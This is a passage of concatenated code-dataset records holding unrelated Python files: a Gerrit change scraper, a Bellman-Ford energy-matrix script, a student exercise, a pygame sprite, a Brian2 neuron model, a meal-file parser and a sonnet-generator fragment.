headers=COOKIE_HEADERS)\n print(\"status_code =\", response_data.status_code)\n data = response_data.text\n #print(\"data=\", data)\n # content = data.text #你要的数据,JSON格式的\n data = remove_redundant_string(data)\n #print(\"2 data=\", data)\n data_json = json.loads(data)\n page_num = 0\n with open(EXPORT_CSV_PATH, \"a\", newline='') as csvfile:\n writer = csv.writer(csvfile)\n for one in data_json:\n page_num = page_num + 1\n change_id = str(one[\"_number\"])\n commit_id = request_certain_commit(connect_session, change_id)\n \n if get_patch_method == 1:\n download_by_url(connect_session, commit_id, change_id, EXPORT_DIR_PATH)\n elif get_patch_method == 2:\n real_project_path = get_project_path(one[\"project\"], one[\"branch\"], LOCAL_CODE_BASE)\n generate_code_patch(commit_id, real_project_path, EXPORT_DIR_PATH)\n\n writer.writerow([one[\"project\"], one[\"branch\"], one[\"subject\"], one[\"owner\"][\"name\"], CERTAIN_LINK_PREFIX + change_id, commit_id, one[\"updated\"]])\n print(one[\"project\"], one[\"branch\"], one[\"subject\"], one[\"owner\"][\"name\"], CERTAIN_LINK_PREFIX + change_id, commit_id, one[\"updated\"])\n time.sleep(REQUEST_INTERVAL)\n if page_num < CHANGES_PER_PAGE :\n print(\"last page :\",continue_flag,\"change num :\", page_num)\n continue_flag = -1\n time.sleep(REQUEST_INTERVAL)\n return continue_flag, QUERY_URL + \"&S=\" + str(continue_flag * CHANGES_PER_PAGE)\n\n\n\n#############################################################\n# 请求某个具体gerrit链接的response json\n# 返回commit_id\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef request_certain_commit(connect_session, num):\n url = CERTAIN_LINK_TEMPLATE.format(str(num))\n print(\"url =\" + url)\n data = None\n if connect_session is None:\n data = requests.get(url, headers= COOKIE_HEADERS).text\n else:\n data = connect_session.get(url, headers= LOGIN_REQUEST_HEADER).text\n data = remove_redundant_string(data)\n #print(\"333 data =\" + data)\n data_json = json.loads(data)\n print(\"commit_id =\"+data_json[\"current_revision\"])\n return data_json[\"current_revision\"]\n\n\n\n#############################################################\n# 
去除ajax返回response中 ,json串前几个无用字符 “ )]}' ”\n# 返回 过滤后的字符串\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef remove_redundant_string(data):\n remove = re.compile('\\)\\]\\}\\'')\n data = re.sub(remove, \"\", data)\n return data\n\n\n#############################################################\n# 登录给定网址\n# 参数 url -- 给定网址 , username -- 用户名 , password -- 密码\n# 返回 状态码\n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef login_site(login_session, url, username, password):\n login_response = login_session.post(url, data = { 'username': username, 'password': password }, headers = LOGIN_REQUEST_HEADER)\n print(\"login response =\", login_response)\n if login_response:\n print(\"login status code =\",login_response.status_code)\n if login_response.status_code == STATUS_CODE_OK:\n print(\"login success\")\n else:\n print(\"login failed\")\n return login_response.status_code\n return -1\n\n\n#############################################################\n# 输入用户名/密码\n# 参数 \n# 返回 username (str) ,password (str) \n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef input_user_profile():\n print(\"Login url is \", LOGIN_URL)\n print(\"csv save path is \", EXPORT_CSV_PATH)\n username = input(\"Please input your username: \")\n password = getpass.getpass(\"Please input your password: \")\n return username,password\n\n\n#############################################################\n# 判断str是否为空\n# 参数 输入str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef str_is_empty(input_str):\n if input_str.strip() == '':\n return True\n return False\n\n\n#############################################################\n# 根据url下载\n# 参数 url -- str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef download_by_url(connect_session, commit_id, change_id, path):\n download_response = None\n if str_is_empty(commit_id) or str_is_empty(change_id):\n print(\"commit_id or change_id is empty\")\n return False\n download_url = DOWNLOAD_LINK_TEMPLATE.format(str(change_id), commit_id)\n if connect_session is None:\n download_response = requests.get(download_url, headers=COOKIE_HEADERS, stream=True)\n print(\"cookie download_by url:\", download_url, \",path:\", path)\n else:\n download_response = connect_session.get(download_url, headers=LOGIN_REQUEST_HEADER, stream=True)\n print(\"login download_by url:\", download_url, \",path:\", path)\n if download_response is None:\n print(\"can not get download response\")\n return False\n if download_response.status_code != STATUS_CODE_OK:\n print(\"download response error:\",download_response.status_code)\n return False\n if download_response.iter_content is None:\n print(\"can not get download content\")\n return False\n short_commit = get_short_commit(commit_id)\n download_dir = path + \"gerrit_\" + get_current_date(CURRENT_DATE_PATTERN) + PATH_SPERATOR + short_commit + PATH_SPERATOR\n print(\"download_dir is:\", download_dir)\n if not os.path.exists(download_dir):\n os.makedirs(download_dir)\n download_patch_path = download_dir + PATH_SPERATOR + short_commit + '.diff.zip'\n with open(download_patch_path, \"wb\") as writer:\n for chunk in download_response.iter_content(chunk_size=512):\n if chunk:\n writer.write(chunk)\n return True\n\n\n\n#############################################################\n# 
获取commit_id的前7位作为标识\n# 参数 commit_id -- str\n# 返回 str\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef get_short_commit(commit_id):\n if not str_is_empty(commit_id):\n if len(commit_id) >= SHORT_COMMIT_ID_LENGTH:\n commit_id = commit_id[:SHORT_COMMIT_ID_LENGTH]\n return commit_id\n\n\n#############################################################\n# 获取当前时间\n# 返回 str -- %Y%m%d%H%M\n#\n# add by HQ hujingcheng 20211231 \n#############################################################\ndef get_current_date(pattern):\n return time.strftime(pattern, time.localtime()) \n\n\n#############################################################\n# 获取manifest.xml软链接指向的路径\n# 返回 str -- 绝对路径\n#\n# add by HQ hujingcheng 20220105 \n#############################################################\ndef get_real_manifest(slink):\n if os.path.islink(slink):\n return os.path.realpath(slink)\n return None\n\n#############################################################\n# 根据从gerrit网站上获取的project和branch信息\n# ,在代码的manifest.xml中获取到代码中实际仓库路径\n#\n# 返回 str -- 代码中仓库路径\n#\n# add by HQ hujingcheng 20220105 \n#############################################################\ndef get_project_path(project_name, branch_name, code_path):\n manifest_real_path = os.path.realpath(code_path + MANIFEST_SOFT_LINK)\n tree = XmlUtils.read_xml(manifest_real_path)\n project_nodes = tree.findall(\"project\")\n kv_map = {\"name\": project_name, \"revision\": branch_name}\n for node in project_nodes:\n if XmlUtils.check_node_by_attribute(node, kv_map):\n project_path = node.get(\"path\")\n #print(\"project_path =\", project_path)\n return project_path\n return None\n\n\n#############################################################\n# 根据url下载\n# 参数 url -- str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef generate_code_patch(commit_id, real_project_path, output_path):\n short_commit = get_short_commit(commit_id)\n download_dir = output_path + \"gerrit_\" + get_current_date(CURRENT_DATE_PATTERN) + PATH_SPERATOR + short_commit + PATH_SPERATOR\n if not os.path.exists(download_dir):\n os.makedirs(download_dir)\n os.system(\"cd \" + real_project_path)\n os.system(\"git_patch_generate \" + short_commit)\n os.system(\"mv -f \")\n \n\n#两个字符串转int 相减计算大小\ndef time_cmp(first_time, second_time):\n print(first_time)\n print(second_time)\n return int(first_time) - int(second_time)\n\n#对时间\"2017-12-11 02:07:27.000000000\"格式化为20171211020727\ndef time_format(time):\n time = time.replace('.000000000', \"\")\n time = time.replace(' ', \"\")\n time = time.replace(':', \"\")\n time = time.replace('-', \"\")\n return time\n\n'''\n#用正则表达式统计不符合规范的人员及其出现的个数 得到一个DataFrame\ndef subject_format_count():\n nonstandard_count={}\n #newline=' '可以防止两行之间出现空行\n with open(r\"gerrit.csv\",newline='') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n matchObj = re.match(r\"^TFS_\\d+:\" + row[3] + \"_\\D+\\w+:.+\", row[2])\n if matchObj:\n pass\n else:\n if row[3] in nonstandard_count:\n nonstandard_count[row[3]] += 1\n else:\n nonstandard_count[row[3]] = 1\n #去掉统进来的标签\n nonstandard_count.pop('owner')\n #按出现次数递减排序\n sort_nonstandard_count = sorted(nonstandard_count.items(), key=lambda v: v[1], reverse=True)\n #这地方的设置可以先查看sort_nonstandard_count 然后看看具体要的是哪个值 根据这里再写可视化\n df = pandas.DataFrame(sort_nonstandard_count, index=[item[0] for item in sort_nonstandard_count])\n return df\n\n'''\n\n##可视化处理###############\n'''\ndef 
view_format_count(df):\n # x为横坐标刻度\n x = np.arange(len(df.index))\n # 设置y轴的数值,取df的1列,0列为横坐标\n y = np.array(df[1])\n # 设置x横坐标显示为0列的名字\n xticks1 = np.array(df[0])\n # 设置横坐标格式 倾斜30°\n plt.xticks(x, xticks1, size='small', rotation=30)\n # 画出柱状图 appha为透明度\n plt.bar(x, y, width=0.35, align='center', color='c', alpha=0.8)\n # 在柱形图上方显示y值 zip(x,y)得到的是tuple列表 即各列顶点的坐标\n # 然后再各列的顶点上方0.05设置一个文本 ha水平对齐left,right,center va垂直对齐 'center' , 'top' , 'bottom' ,'baseline'\n for a, b in zip(x,y):\n plt.text(a, b + 0.05, '%.0f' %b, ha='center', va='bottom', fontsize=11)\n plt.show()\n\n'''\n\n###################################################\n# Main Script\n###################################################\ndef main():\n global get_patch_method\n #print(\"manifest.xml real path is\", os.path.realpath(LOCAL_CODE_BASE + MANIFEST_SOFT_LINK))\n #XmlUtils.test()\n #get_project_path('','',LOCAL_CODE_BASE)\n for i in range(len(sys.argv)):\n if \"-p\" == sys.argv[i]:\n get_patch_method = 1\n print(\"\\033[1;31;40m Warning!!! \\033[0m\")\n print(\"\\033[1;31;40m You will download the patch from gerrit server! \\033[0m\")\n elif \"-l\" == sys.argv[i]:\n if not os.path.exists(LOCAL_CODE_BASE):\n print(\"\\033[1;31;40mWarning!!! code base:\", LOCAL_CODE_BASE, \"does not exist! \\033[0m\")\n exit(1)\n get_patch_method = 2\n print(\"\\033[1;31;40m Warning!!! \\033[0m\")\n print(\"\\033[1;31;40m You will generate the patch from code base:\", LOCAL_CODE_BASE, \"! \", \"\\033[0m\")\n print(\"\\033[1;31;40m Please ensure the code base is updated to latest! \\033[0m\")\n\n username, password = input_user_profile()\n useCookie = False\n connect_session = None\n if str_is_empty(username) or str_is_empty(password):\n print(\"username or password is empty\")\n useCookie = True\n if not useCookie:\n connect_session = requests.session()\n login_status_code = login_site(connect_session, LOGIN_URL, username, password)\n if login_status_code != 200:\n print(\"Can not login in, exit\")\n exit(0)\n url = QUERY_URL\n continue_flag = 0\n #写标题\n \n with open(EXPORT_CSV_PATH, \"w\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([\"project\", \"branch\", \"subject\", \"owner\", \"link\", \"commit_id\", \"updated\"])\n # 循环爬下一页\n while (continue_flag >= 0):\n continue_flag, url = request_general_info(connect_session, url, continue_flag)\n #continue_flag, url = requesst2(url, continue_flag)\n #处理数据并可视化\n #view_format_count(subject_format_count())\n\n\nif __name__ == '__main__':\n main()\n###################################################\n# End of File\n###################################################\n","sub_path":"python/gerrit_changes.py","file_name":"gerrit_changes.py","file_ext":"py","file_size_in_byte":16829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"1945136","text":"# py 2.7\nimport copy\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\n\nfrom collections import deque\n\ndef add_symmetry(df):\n\n for i in df.index:\n for j in df.columns:\n if df.loc[i,j]!=0:\n df.loc[j,i] = -1*(df.loc[i,j])\n\n return(df)\n\ndef from_pd_df(df):\n\n gr = nx.DiGraph()\n for i in df.index:\n for j in df.columns:\n if df.loc[i, j] != 0:\n gr.add_edge(i, j, weight=df.loc[i, j])\n return(gr)\n\ndef bellman_ford(G, source, weight='weight'):\n \"\"\"Compute shortest path lengths and predecessors on shortest paths\n in weighted graphs.\n\n The algorithm has a running time of O(mn) where n is the number of\n nodes and m is the number of edges. 
It is slower than Dijkstra but\n can handle negative edge weights.\n\n Parameters\n ----------\n G : NetworkX graph\n The algorithm works for all types of graphs, including directed\n graphs and multigraphs.\n\n source: node label\n Starting node for path\n\n weight: string, optional (default='weight')\n Edge data key corresponding to the edge weight\n\n Returns\n -------\n pred, dist : dictionaries\n Returns two dictionaries keyed by node to predecessor in the\n path and to the distance from the source respectively.\n\n Raises\n ------\n NetworkXUnbounded\n If the (di)graph contains a negative cost (di)cycle, the\n algorithm raises an exception to indicate the presence of the\n negative cost (di)cycle. Note: any negative weight edge in an\n undirected graph is a negative cost cycle.\n\n Examples\n --------\n >>> import networkx as nx\n >>> G = nx.path_graph(5, create_using = nx.DiGraph())\n >>> pred, dist = nx.bellman_ford(G, 0)\n >>> sorted(pred.items())\n [(0, None), (1, 0), (2, 1), (3, 2), (4, 3)]\n >>> sorted(dist.items())\n [(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]\n\n >>> from nose.tools import assert_raises\n >>> G = nx.cycle_graph(5, create_using = nx.DiGraph())\n >>> G[1][2]['weight'] = -7\n >>> assert_raises(nx.NetworkXUnbounded, nx.bellman_ford, G, 0)\n\n Notes\n -----\n Edge weight attributes must be numerical.\n Distances are calculated as sums of weighted edges traversed.\n\n The dictionaries returned only have keys for nodes reachable from\n the source.\n\n In the case where the (di)graph is not connected, if a component\n not containing the source contains a negative cost (di)cycle, it\n will not be detected.\n\n \"\"\"\n if source not in G:\n raise KeyError(\"Node %s is not found in the graph\" % source)\n\n for u, v, attr in G.selfloop_edges(data=True):\n if attr.get(weight, 1) < 0:\n raise nx.NetworkXUnbounded(\"Negative cost cycle detected.\")\n\n dist = {source: 0}\n pred = {source: None}\n\n if len(G) == 1:\n return pred, dist\n\n return _bellman_ford_relaxation(G, pred, dist, [source], weight)\n\ndef _bellman_ford_relaxation(G, pred, dist, source, weight):\n \"\"\"Relaxation loop for Bellman–Ford algorithm\n\n Parameters\n ----------\n G : NetworkX graph\n\n pred: dict\n Keyed by node to predecessor in the path\n\n dist: dict\n Keyed by node to the distance from the source\n\n source: list\n List of source nodes\n\n weight: string\n Edge data key corresponding to the edge weight\n\n Returns\n -------\n Returns two dictionaries keyed by node to predecessor in the\n path and to the distance from the source respectively.\n\n Raises\n ------\n NetworkXUnbounded\n If the (di)graph contains a negative cost (di)cycle, the\n algorithm raises an exception to indicate the presence of the\n negative cost (di)cycle. 
Note: any negative weight edge in an\n undirected graph is a negative cost cycle\n \"\"\"\n if G.is_multigraph():\n def get_weight(edge_dict):\n return min(eattr.get(weight, 1) for eattr in edge_dict.values())\n else:\n def get_weight(edge_dict):\n return edge_dict.get(weight, 1)\n\n G_succ = G.succ if G.is_directed() else G.adj\n inf = float('inf')\n n = len(G)\n\n count = {}\n q = deque(source)\n in_q = set(source)\n while q:\n u = q.popleft()\n in_q.remove(u)\n # Skip relaxations if the predecessor of u is in the queue.\n if pred[u] not in in_q:\n dist_u = dist[u]\n for v, e in G_succ[u].items():\n dist_v = dist_u + get_weight(e)\n if dist_v < dist.get(v, inf):\n if v not in in_q:\n q.append(v)\n in_q.add(v)\n count_v = count.get(v, 0) + 1\n if count_v == n:\n raise nx.NetworkXUnbounded(\n \"Negative cost cycle detected.\")\n count[v] = count_v\n dist[v] = dist_v\n pred[v] = u\n\n return pred, dist\n\ndef fill_zeros(df):\n\n temp = copy.copy(df)\n\n # Deal only with positive energy reactions\n temp[temp<0] = 0\n # Maximisation => MInimisation\n temp = -1*temp\n\n gr = from_pd_df(temp)\n\n for i in temp.index:\n\n try:\n p = bellman_ford(gr, i, weight = 'weight')\n\n except nx.NetworkXUnbounded:\n print('{} is involved in an infinite cycle'.format(i))\n\n return(None)\n\n for j in p[1]:\n if df.loc[i,j] == 0:\n # Add a small fee for direct reaction to aid symbiotic chains\n temp.loc[i,j] = p[1][j] + 0.05\n temp.loc[j, i] = -1*p[1][j]\n\n temp = -1*temp\n\n temp = add_symmetry(temp)\n\n return(temp)\n\nnames = [_ for _ in 'ABCDEFGHJK']\n\nen_df = pd.DataFrame(np.zeros((10,10)), index=names, columns=names)\n\n# cycle1\nen_df.loc['A','F'] = 1.9\nen_df.loc['F','B'] = 0.8\nen_df.loc['B', 'G'] = 4.6\nen_df.loc['G','C'] = 1.5\n# Direct a -> c should be no more than indirect conversion\nen_df.loc['A','C'] = 8.7\n\n# cycle2\nen_df.loc['H','D'] = 5\nen_df.loc['H','E'] = 2\nen_df.loc['E','J'] = 1.1\n\nen_df.loc['K','E'] = 1.2\n\nen_df.loc['H', 'G'] = 1\n\nen_df = add_symmetry(en_df)\nx = fill_zeros(en_df)\n\n","sub_path":"Graphs_and_such/energy_matrix.py","file_name":"energy_matrix.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544179020","text":"#Create a function that computes the factorial of a number \n#using a standard for loop. Example:\n # 5! 
= 5 * 4 * 3 * 2 * 1\n #factorial_with_for_loop(5) # 120\n \n\n\"\"\"def factorial_for(n):\n for i in range(1, n) :\n fact = (n * (n - 1) * (n - 2) * (n - 3) * (n - 4))\n print(fact)\n\nfactorial_for(4)\n\n\"\"\"\n\nresult = 1\n\n\ndef sum_numbers(n):\n \n for i in range(1, n + 1):\n result = result + i\n return result\n\nsum_numbers(3) \n \n","sub_path":"class-9/Kellie/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591388446","text":"import pygame\r\n\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n def __init__(self, image_dict, center, size):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.size = size\r\n self.image_dict = image_dict\r\n self.image = self.image_dict[self.size][0]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = center\r\n self.frame = 0\r\n self.frame_delay = 50\r\n self.timer = pygame.time.get_ticks()\r\n\r\n def update(self):\r\n now = pygame.time.get_ticks()\r\n if now - self.timer > self.frame_delay:\r\n self.timer = now\r\n self.frame += 1\r\n if self.frame < 9:\r\n old_center = self.rect.center\r\n self.image = self.image_dict[self.size][self.frame]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = old_center\r\n else:\r\n self.kill()\r\n","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272157719","text":"#!/usr/bin/env python3\nimport sys\n\nif len(sys.argv) == 2:\n fn = sys.argv[1]\nelse:\n exit(0)\n\ninput = open(fn)\nlines = input.readlines()\nfor line in lines:\n print(line.rstrip())\n\n","sub_path":"code/python/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219408230","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 24 22:37:45 2018\r\n\r\n@author: M.Ali GÜL\r\n\"\"\"\r\n\r\nfrom brian2 import *\r\nfrom numpy import *\r\nfrom matplotlib.pyplot import *\r\n\r\nstart_scope()\r\n###############################################################################\r\n#Thalamic Cell Model\r\nN_THL = 80\r\nC_THL = 13\r\nvr_THL = -60\r\nvt_THL = -50\r\nk_THL = 0.11\r\na_THL = 0.05\r\nb_THL = 2\r\nc_THL = -65\r\nd_THL = 2\r\nvpeak_THL = 35\r\n\r\neqsTHL = '''\r\ndv/dt = (((k_THL*(v-vr_THL)*(v-vt_THL)) - u + I)/C_THL)/ms : 1\r\ndu/dt = a*(b*(v-vr_THL)-u)/ms : 1\r\nvr : 1\r\nvt : 1\r\na : 1\r\nb : 1\r\nd : 1\r\nc : 1\r\nI : 1\r\n'''\r\nreset_THL = '''\r\nv = c - 0.1*u\r\nu = u + d\r\n'''\r\nGTHL = NeuronGroup(N_THL, eqsTHL, method='euler', threshold = 'v>vpeak_THL+0.1*u',reset = reset_THL)\r\nGTHL.vr = vr_THL\r\nGTHL.vt = vt_THL\r\nGTHL.a = a_THL\r\nGTHL.b = b_THL\r\nGTHL.c = c_THL\r\nGTHL.d = d_THL\r\nGTHL.v = vr_THL\r\nGTHL.u = GTHL.b*(GTHL.v)\r\n###############################################################################\r\nstm = StateMonitor(GTHL, 'v', record = True)\r\nstm2 = StateMonitor(GTHL, 'I', record = True)\r\nspk = SpikeMonitor(GTHL)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = 100\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = 200\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = -100\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n'''\r\nGTHL.I = 100\r\nrun(1000*ms)\r\n\r\nGTHL.I = 0\r\nrun(400*ms)\r\n'''\r\nfigure(figsize=(18,6))\r\nsubplot(30,1,(1,24))\r\nplot(stm.t/ms, 
stm.v[0], 'r', lw = 1.5)\r\nxlim((0,1000))\r\nylabel('mV',fontsize = 16)\r\ntitle('Thalamus',fontsize = 32)\r\n\r\nsubplot(30,1,(26,30))\r\nplot(stm2.t/ms, stm2.I[0], 'r', lw=3)\r\nylim(min(stm2.I[0]),max(stm2.I[0])+20)\r\nxlabel('Time (ms)',fontsize = 16)\r\nylabel('I (uA)',fontsize = 16)","sub_path":"Last_THL_one_cell.py","file_name":"Last_THL_one_cell.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"143014221","text":"from jedzenielib.ingredient import Ingredient\nfrom jedzenielib.food import FOOD_TYPE\nfrom jedzenielib.food import Food\n\nimport linecache \n\n__iMeatEnd = -1\n__iVeganEnd = -1\n__iVegetarianEnd = -1\n\n__iMeatStart = -1\n__iVeganStart = -1\n__iVegetarianStart = -1\n\ndef parseIndexes(szCurrLine, index):\n global __iMeatStart \n global __iVeganStart \n global __iVegetarianStart \n global __iMeatEnd \n global __iVeganEnd \n global __iVegetarianEnd \n \n if(szCurrLine == \"# BEGIN MEAT MEALS\\n\"):\n __iMeatStart = index \n elif ( szCurrLine == \"# BEGIN VEGAN MEALS\\n\"):\n __iVeganStart = index \n elif ( szCurrLine == \"# BEGIN VEGETARIAN MEALS\\n\"):\n __iVegetarianStart = index \n elif ( szCurrLine == \"# END MEAT MEALS\\n\"):\n __iMeatEnd = index \n elif ( szCurrLine == \"# END VEGETARIAN MEALS\\n\"):\n __iVegetarianEnd = index \n elif ( szCurrLine == \"# END VEGAN MEALS\\n\"):\n __iVeganEnd = index \n\ndef createFood(fileContent, startIndex, currType):\n currIndex = startIndex \n splittedMeal = fileContent[currIndex].split(' ')\n mealName = splittedMeal[3].rstrip('\\n')\n currIndex += 1\n\n foodToAdd = Food(mealName, currType)\n\n while fileContent[currIndex] != \"\\t# END MEAL\\n\":\n currPrice = 0.0\n currWeight = 0\n currName = \"\"\n listIngredient = fileContent[currIndex].split('\\t')\n currPrice = float(listIngredient[3])\n currWeight = int(listIngredient[2])\n currName = listIngredient[1]\n ingredientToAdd = Ingredient(currName, currPrice, currWeight)\n \n\n foodToAdd.addIngredient(ingredientToAdd)\n currIndex+=1\n\n return foodToAdd \ndef parseFoods(fileContent):\n foodList = []\n currIndex = __iMeatStart\n maxIndex = __iMeatEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.MEAT))\n currIndex += 1\n \n currIndex = __iVeganStart \n maxIndex = __iVeganEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.VEGAN))\n currIndex += 1\n \n\n currIndex = __iVegetarianStart\n maxIndex = __iVegetarianEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.VEGETARIAN))\n currIndex += 1\n return foodList;\n\n\ndef getFoods(szPath):\n print(\"Get foods, version 0.0.1, Marek Szwajka\")\n mealFile = open(szPath, \"r\")\n contentFile = mealFile.readlines()\n index = 0\n for currLine in contentFile:\n parseIndexes(currLine, index)\n index += 1\n\n toRet = parseFoods(contentFile)\n \n mealFile.close()\n return toRet;\n","sub_path":"build/lib/jedzenielib/fileLoader.py","file_name":"fileLoader.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"531690482","text":"# Create a tmp file to pass the chosen field class to wkb class\nf = 
open('tmp_config.py','w')\nf.write('fieldclass=\\'Double2dNullSeparator\\'')\nf.close()\n# Path relative to main directory\nimport sys\nsys.path.append('../')\n# Import\nimport matplotlib.pyplot as plt\nimport wkb_fast_zerobeta as wkb\nimport math\nfrom magnetic_field import Double2dNullSeparator as magnetic_field\nimport numpy as np\n# Remove the f\nimport os\nos.remove('tmp_config.py')\n\n\n# Plot fieldlines as contours of the flux functon\nx0 = -2.5 \nx1 = 2.5 \ny0 = x0 \ny1 = x1\nnx = 300\nny = nx\ngx = np.linspace(x0,x1,nx)\ngy = np.linspace(y0,y1,ny)\n\naz = np.zeros([nx,ny])\n\nfor iy in range(0,ny-1):\n for ix in range(0,nx-1):\n b = magnetic_field(gx[ix],gy[iy], 0.0)\n az[iy,ix] = b.az \n\n#plt.rcParams['contour.negative_linestyle'] = 'solid'\n#plt.contour(gx,gy,az,25,colors='blue')\n#plt.contour(gx,gy,az,levels=[0],colors='red')\n\n# solve the rays iteratively\nx0 = -1.\ny0 = 0.\nz0 = 0.\nd = 0.1 # radius\nnrays =40\ndphi_dr = -1.0\nt_end = 23.0\ns_end = t_end / 2.0 / math.pi \nns = 100\n\nswarm1 = wkb.Swarm.init_circle_zplane(x0,y0,z0,d,nrays,dphi_dr)\nswarm1.solve(s_end,ns)\n\n#for myray in swarm1.rays:\n# plt.plot(myray.x,myray.y,'black')\n#plt.xlabel('x')\n#plt.ylabel('y')\n#plt.axis([-2,2, -2,2])\n#plt.show()\n\n\n\nprint('ODE solve for swarm done. Now making the figures at the sampling times')\n\noutdir = 'frames/'\nif not os.path.exists(outdir):\n os.mkdir(outdir)\n\nfor i in range(0,ns-1):\n plt.contour(gx,gy,az,levels=[0],colors='red')\n for myray in swarm1.rays:\n plt.plot(myray.x[i],myray.y[i],'k+') # ko is ok too\n if i > 4:\n plt.plot(myray.x[i-3:i],myray.y[i-3:i],'k')\n title = '{:0.2f}'.format(swarm1.rays[1].t[i])\n title = 't = '+title\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title(title)\n plt.axis([-2,2,-2,2])\n filename = '{:04d}'.format(i)\n filename = outdir+'/'+filename+'.png'\n plt.savefig(filename,dpi=300)\n msg = 'saved image '+filename \n print(msg)\n plt.clf()\n","sub_path":"SR/circswarm_field_sep_movie.py","file_name":"circswarm_field_sep_movie.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"593450170","text":"import numpy as np\nimport pickle\nfrom collections import defaultdict\nfrom py_files import helper\nimport random\nfrom py_files import line\n#from sonnet_basic import *\n#from sonnet_basic import *\n\nclass Sonnet_Gen():\n def __init__(self,postag_file='saved_objects/postag_dict_all+VBN.p',\n syllables_file='saved_objects/cmudict-0.7b.txt',\n wv_file='saved_objects/word2vec/model.txt',\n top_file='saved_objects/words/top_words.txt' ,\n extra_stress_file='saved_objects/edwins_extra_stresses.txt', prompt=False):\n with open(postag_file, 'rb') as f:\n postag_dict = pickle.load(f)\n self.pos_to_words = postag_dict[1]\n self.words_to_pos = postag_dict[2]\n #these are the hardcoded scenery words\n self.pos_to_words[\"scNNS\"] = [\"forests\", \"branches\", \"roots\", \"twigs\", \"brambles\", \"fruits\", \"thorns\", \"bushes\", \"trees\", \"foliages\", \"stumps\", \"weeds\"]\n self.pos_to_words[\"scJJS\"] = [\"darkest\", \"deepest\", \"strangest\", \"longest\", \"silentest\", \"quietest\", \"mysteriousest\", \"lonliest\", \"saddest\", \"eeriest\"]\n self.pos_to_words[\"scJJ\"] = [\"dark\", \"deep\", \"strange\", \"long\", \"silent\", \"quiet\",\n \"mysterious\", \"lonely\", \"sad\", \"eerie\"]\n for item in self.pos_to_words[\"scNNS\"]: #we need to update the pos_to_words dictionary for each word\n if item not in self.words_to_pos.keys():\n 
self.words_to_pos[item] = [\"scNNS\"]\n else:\n self.words_to_pos[item].append(\"scNNS\")\n for item in self.pos_to_words[\"scJJS\"]:\n if item not in self.words_to_pos.keys():\n self.words_to_pos[item] = [\"scJJS\"]\n else:\n self.words_to_pos[item].append(\"scJJS\")\n for item in self.pos_to_words[\"scJJ\"]:\n if item not in self.words_to_pos.keys():\n self.words_to_pos[item] = [\"scJJ\"]\n else:\n self.words_to_pos[item].append(\"scJJ\")\n\n self.special_words = helper.get_finer_pos_words()\n\n self.api_url = 'https://api.datamuse.com/words'\n\n with open(top_file) as tf:\n self.top_common_words = [line.strip() for line in tf.readlines()]\n\n\n with open(\"saved_objects/filtered_nouns_verbs.txt\", \"r\") as hf:\n self.filtered_nouns_verbs = [line.strip() for line in hf.readlines()]\n self.filtered_nouns_verbs += self.pos_to_words[\"IN\"] + self.pos_to_words[\"PRP\"]\n\n self.dict_meters = helper.create_syll_dict([syllables_file], extra_stress_file)\n \"\"\"try:\n with open(\"saved_objects/w2v.p\", \"rb\") as pickle_in:\n self.poetic_vectors = pickle.load(pickle_in)\n except:\n print(\"loading vectors....\")\n with open(\"saved_objects/w2v.p\", \"wb\") as pickle_in:\n #self.poetic_vectors = KeyedVectors.load_word2vec_format(wv_file, binary=False)\n self.poetic_vectors = self.filtered_nouns_verbs\n pickle.dump(self.poetic_vectors, pickle_in)\n print(\"loaded\")\"\"\"\n\n #print(self.poetic_vectors.shape)\n\n #with open(\"poems/shakespeare_tagged.p\", \"rb\") as 